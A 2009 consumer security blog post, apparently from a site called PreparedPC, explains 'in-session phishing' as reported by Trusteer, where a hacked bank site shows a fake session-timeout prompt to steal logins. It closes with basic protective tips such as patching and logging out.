Your PC. Prepared for Anything.
In-Session Phishing – Keep Your Guard Up!
By now, most people know about phishing emails. You know, those messages made to look like they are from banks and other financial institutions, sent out in the hope that someone will click on the phony link and enter their username and password?
A recent threat to watch out for is called “in session phishing.” The research firm Trusteer recently published an advisory which warns against an exploit that could be used to trick you into giving away the user name and password for your web-based financial site.
How In Session Phishing Works
First, the financial website must be compromised. A hacker needs to upload their malicious code to the site’s server. Unfortunately, with the number of unpatched web servers, there is a real possibility that a website can be hacked.
The second part of the attack takes place as a customer accesses their financial institution’s site, logging on normally to a secure session. So far, so good. The problem happens when the computer user, still logged into that website, opens another tab, perhaps to visit another website. At that point, a JavaScript function, used by the most popular browsers to determine if the user is logged in, is called from the hacked website. If the browser responds “yes,” the browser displays a phony, but convincing “Your session for ABC Bank has timed out. Please enter your user name and password to continue” message. If the user enters their information, their user name and password can be stolen–bad news, indeed!
How Can I Protect Myself?
Besides the basics of keeping your computer patched with the latest updates, and keeping your antivirus software up-to-date, protect yourself by simply knowing whether you are still logged in to your financial website (or finish your business, then log out). This is the electronic equivalent of knowing whether someone is standing behind you at an ATM machine, watching you enter your PIN.
Stay vigilant so that you can stay ahead of the bad folks who hope to trick you out of your identity. Your online financial accounts may depend on it.
Photo: Vince Alongi
| Print article | This entry was posted by PreparedPC on January 15, 2009 at 5:56 pm, and is filed under Web Browsing. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |